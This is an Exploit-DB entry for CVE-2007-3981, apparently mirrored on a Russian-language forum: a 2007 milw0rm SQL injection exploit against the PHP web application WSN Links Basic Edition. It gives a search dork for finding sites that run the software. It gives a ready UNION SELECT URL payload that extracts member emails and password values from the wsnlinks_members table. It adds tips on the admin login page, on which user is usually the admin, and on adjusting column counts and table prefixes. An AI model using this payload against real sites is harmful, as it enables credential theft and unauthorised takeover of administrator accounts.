- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4209
- Проверка EDB
-
- Пройдено
- Автор
- T0PP8UZZ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-3981
- Дата публикации
- 2007-07-21
Код:
--==+================================================================================+==--
--==+ WSN Links Basic Edition SQL Injection Vulnerbility +==--
--==+================================================================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: wsnforum.com
DORK: Google: intext:"Powered by WSN Links Basic Edition" Altavista: "Powered by WSN Links Basic Edition"
DESCRIPTION:
pull out member info from the database
EXPLOITS:
http://www.server.com/Script_Dir/index.php?action=displaycat&catid=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/FROM/**/wsnlinks_members/**/LIMIT/**/0,1/*
NOTE/TIP:
admin login is at Script_Dir/adminlogin.php usually the first user is admin
also the amount of 'columns' may differ althou its normally 35 or 28.
the script also uses table prefix, the most used are wsnlinks and wsn so that would make the table wsn_members ect.
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+================================================================================+==--
--==+ WSN Links Basic Edition SQL Injection Vulnerbility +==--
--==+================================================================================+==--
# milw0rm.com [2007-07-21]- Источник
- www.exploit-db.com
